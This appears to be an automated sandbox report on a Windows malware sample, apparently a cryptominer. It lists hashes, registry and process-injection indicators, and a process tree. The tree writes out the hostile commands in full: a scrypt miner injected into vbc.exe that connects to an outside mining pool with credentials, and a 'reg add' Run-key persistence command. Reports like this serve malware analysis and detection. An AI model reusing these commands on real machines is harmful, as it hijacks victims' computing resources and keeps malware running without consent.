Analysis
-
max time kernel
170s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2022 21:47
Static task
static1
Behavioral task
behavioral1
Sample
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
Resource
win10v2004-20220812-en
General
-
Target
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe
-
Size
1.3MB
-
MD5
d08af005a79bb8e5f92e32b52874b722
-
SHA1
7a95179e88f4a6ee33192f13dfc5c2b9d8274bc6
-
SHA256
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4
-
SHA512
c8893b32215d4b1d57f0143cdc9d7b809fa2adba2fad6826bad52310da0ecc355a06d6b832830e757480bd2174a507ab51d97b7873860f0bbee4c5b296f433b1
-
SSDEEP
24576:esabjkjys3jhmgWKU8tkYphKqK2B54cDW4EmolRCpSSup5Uixp2IQtHZq:esaPkp311Hf3KW1DW4iOSSuptv2d5
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wcenter = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Wcenter82.exe" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exedescription pid process target process PID 4760 set thread context of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
vbc.exe9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz vbc.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vbc.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vbc.exe -
Suspicious behavior: EnumeratesProcesses 48 IoCs
Processes:
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exepid process 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exedescription pid process Token: SeDebugPrivilege 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.execmd.exedescription pid process target process PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1708 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe vbc.exe PID 4760 wrote to memory of 1732 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe cmd.exe PID 4760 wrote to memory of 1732 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe cmd.exe PID 4760 wrote to memory of 1732 4760 9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe cmd.exe PID 1732 wrote to memory of 212 1732 cmd.exe reg.exe PID 1732 wrote to memory of 212 1732 cmd.exe reg.exe PID 1732 wrote to memory of 212 1732 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"C:\Users\Admin\AppData\Local\Temp\9ab9af03589bf3821e753a40c7b2899dccf7cc358bbb01b89bb87dc640a5cbb4.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -a scrypt -o stratum+tcp://hot.wemineltc.com:3334 -u lover83.raid -p lover123123 -T 83 -t 2 -g No2⤵
- Checks processor information in registry
PID:1708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Wcenter" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Wcenter82.exe3⤵
- Adds Run key to start application
PID:212